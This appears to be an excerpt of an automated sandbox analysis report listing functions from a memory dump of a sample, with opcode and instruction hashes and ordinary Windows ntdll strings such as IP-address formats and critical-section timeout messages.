Instruction ID: 9ff5462fbf18240dcec5d2caf507bd818b7d71cfb6c30bd12f46db22c72a8dd0
Opcode Fuzzy Hash: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
Instruction Fuzzy Hash: 3D90043D311510031105F55C47045070057D7D5351355C033F1415550CD731CD715333

Function 010C2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
Instruction ID: 43ab85abedfba76fa2b69735bdd00e5012b9d28fe89aea4a6aa6fab7ab34c2c3
Opcode Fuzzy Hash: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
Instruction Fuzzy Hash: B2900229221510021145B55C460450B0455A7D6351395C016F1816590CC62189655322

Function 010C2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
Instruction ID: 78d799a7d9ba078d425175d8babcbec8f55bf7b33ef422a9d57828c073fb2ea6
Opcode Fuzzy Hash: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
Instruction Fuzzy Hash: B490022520555442E100755C9408A06001597D0205F55D012E1464595DC6358951A232

Function 010C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
Instruction ID: ecfa70658b9b39eb20faddcd07cbe90cf9d34dc28c44ff2749ae8877a6ea2815
Opcode Fuzzy Hash: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
Instruction Fuzzy Hash: 2290022D21351002E180715C940860A001597D1202F95D416E0415558CC91589695322

Function 010C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
Instruction ID: 8628e9bab6a4280b3c2e93b823e84efe5b47ea11ff470ed144b555e552725cd5
Opcode Fuzzy Hash: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
Instruction Fuzzy Hash: BE90022530151003E140715C94186064015E7E1301F55D012E0814554CD91589565323

Function 010C2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62

Function 010C2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722

Function 010C2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622

Function 010C2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232

Function 010C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2

Function 010C2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222

Function 010C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227

Function 010C2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337

Function 010C2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
Opcode Fuzzy Hash: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
Instruction Fuzzy Hash: 2A90023520191402E100715C881470B001597D0302F55C012E1564555DC62589516672

Function 010C2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
Instruction ID: 15ccf085ea955a9f8cf04d686fd7131f5c102fe7d2daacf0ffed59c704dd16b3
Opcode Fuzzy Hash: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
Instruction Fuzzy Hash: B790023520191402E100715C8808747001597D0302F55C012E5564555EC665C9916632

Function 010C2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
Instruction ID: bd63e9d360c8fc32940e01b5e3bfe276d81c83880dc6b2e3e915f593f13d48ff
Opcode Fuzzy Hash: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
Instruction Fuzzy Hash: 9F900225601510425140716CC8449064015BBE1211755C122E0D98550DC55989655766

Function 010C2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
Instruction ID: f9e4b64ccdf6de43697c09f54e28a01be5dd1c21a44b465b23d6e37b0fffc015
Opcode Fuzzy Hash: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
Instruction Fuzzy Hash: 58900225211D1042E200756C8C14B07001597D0303F55C116E0554554CC91589615622

Function 010C2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
Instruction ID: 59a296c1882d376c5ffca640d23a70516df835ee6199f4ea7046ba19122cb285
Opcode Fuzzy Hash: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
Instruction Fuzzy Hash: B990022530151402E102715C84146060019D7D1345F95C013E1824555DC6258A53A233

Function 010C2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
Instruction ID: f12143e3dfc50a638a691c591602be029386b53a50cea896c01e4641a6047eb6
Opcode Fuzzy Hash: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
Instruction Fuzzy Hash: EC90022560151502E101715C8404616001A97D0241F95C023E1424555ECA258A92A232

Function 010C2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
Instruction ID: 3222d2b25440912e98916495796444b4e6e13cfb5da51f9e8f70c26cbc571d53
Opcode Fuzzy Hash: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
Instruction Fuzzy Hash: 5D90027520151402E140715C8404746001597D0301F55C012E5464554EC6598ED56766

Function 010C2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
Instruction ID: 48d62672ad2af1dd8117a263e1245aef0e18e92ea8fc19626cffa350247d4461
Opcode Fuzzy Hash: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
Instruction Fuzzy Hash: FC90026520191403E140755C8804607001597D0302F55C012E2464555ECA298D516236

Function 010C3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
Instruction ID: 013d9097e31262e8d932d5a6bf1782e161c0641e20f9ee7ef48a890494d0f334
Opcode Fuzzy Hash: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
Instruction Fuzzy Hash: 6490022520195442E140725C8804B0F411597E1202F95C01AE4556554CC91589555722

Function 010C3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
Instruction ID: cfaaafe9771839168c619591c60e100dd126ffec722574b78cbdf098f969b0bd
Opcode Fuzzy Hash: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
Instruction Fuzzy Hash: 9590022524151802E140715CC4147070016D7D0601F55C012E0424554DC6168A6567B2

Function 010C39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
Instruction ID: f4dcbe2f876b82df825029d6e11a5b883b781860671f80d9dd05dfc58195520b
Opcode Fuzzy Hash: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
Instruction Fuzzy Hash: DC90022524556102E150715C84046164015B7E0201F55C022E0C14594DC55589556322

Function 010C3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
Instruction ID: f6021ed495f5f2aa8f8e08767c6e668882adaf536544cb56668249e49d0b7ef2
Opcode Fuzzy Hash: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
Instruction Fuzzy Hash: 2890023520251142A540725C9804A4E411597E1302B95D416E0415554CC91489615322

Function 010C3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
Instruction ID: e7d6ee4cf95f8375d5b0b8343d4699337ff36a6468ed4792a5af16eb92146ff6
Opcode Fuzzy Hash: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222

Function 010C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 8180b858bc80128465cbe62474224157435153773c8158baaad54eb40a782727
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 010C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010C293C
___swprintf_l.LIBCMT ref: 010C295E
___swprintf_l.LIBCMT ref: 010C29A3
___swprintf_l.LIBCMT ref: 010FA52E

Strings

:%u.%u.%u.%u, xrefs: 010FA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 010FA54E
ffff:, xrefs: 010FA504
::%hs%u.%u.%u.%u, xrefs: 010FA527

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0

Function 01132410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 011324A6
___swprintf_l.LIBCMT ref: 011324E2
___swprintf_l.LIBCMT ref: 0113257D
___swprintf_l.LIBCMT ref: 011325A3
___swprintf_l.LIBCMT ref: 011325C8
___swprintf_l.LIBCMT ref: 01132608

Strings

:%u.%u.%u.%u, xrefs: 011325FF
::ffff:0:%u.%u.%u.%u, xrefs: 011324DA
ffff:, xrefs: 0113247D, 0113249D
::%hs%u.%u.%u.%u, xrefs: 0113249E

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
Instruction ID: 1a7d08cffb5de6faea4249717a3473130f4d0d32e7806a0f73c9f429f02c4ced
Opcode Fuzzy Hash: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
Instruction Fuzzy Hash: 46510971A04745AEDB38EF5CC8909BFBBF8EF84200B448459E5DAD7689D7B4EA40C760

Function 010B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
Execute=1, xrefs: 010F4713
ExecuteOptions, xrefs: 010F46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
Instruction ID: 8580cd0a3ef20cc38327123b3428a9ad663941a9626619f2f98fe76e5db42c8c
Opcode Fuzzy Hash: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
Instruction Fuzzy Hash: 60510A3164021A6AEB25AB68DCC6FEE77B8FF98704F0400EDD685AB1D1D7709A45CF50

Function 010CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 010CB6BF

Strings

+, xrefs: 010CB65A
0, xrefs: 010CB66F
0, xrefs: 010CB695
-, xrefs: 010CB650

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 565991f5a84cc811990774e0501e5789307d9e90659fd9da6ded81411b8385b5
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 92818D70E052499EEF258F6CC8527EEBBE1AF45BA0F18429DD8D1A7291C7389841CF51

Function 011320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0113214F
___swprintf_l.LIBCMT ref: 01132172

Strings

%%%u, xrefs: 01132146
]:%u, xrefs: 01132169
[, xrefs: 0113212B

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 7db3ffe277b0ea9d20c5b4ba4b995e5c467f9a1e1c9fe413d7f1e2171124ccad
Instruction ID: fa971edff0f732f0dd21dc2c6fa3192b6399ee27de4c59c062fa6d7d1b945f9a
Opcode Fuzzy Hash: 7db3ffe277b0ea9d20c5b4ba4b995e5c467f9a1e1c9fe413d7f1e2171124ccad
Instruction Fuzzy Hash: 8621657AE00219ABDB24EF79CD40AFEBBF8EF94640F04011AE945D7204E730D9018BE1

Function 010AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
RTL: Re-Waiting, xrefs: 010F031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
Instruction ID: dca3e31ebd55f8a39e541d04e3598202a79e495d0c1237423bda084d407f6697
Opcode Fuzzy Hash: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
Instruction Fuzzy Hash: 22E1FF306087429FE765CF68C881B6EBBE1BB88314F144A6DF6E58B6D2D774D844CB42

Function 010BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
RTL: Resource at %p, xrefs: 010F7B8E
RTL: Re-Waiting, xrefs: 010F7BAC

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
Instruction ID: ee38f48ee75ca746dff0801b9ca22ad25d9d87a5bcc66931b0bc15924dba093f
Opcode Fuzzy Hash: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
Instruction Fuzzy Hash: B04103317047038FD725DE29C881BAAB7E5EF89710F000A5DEAD6DB680DB72E405CB92

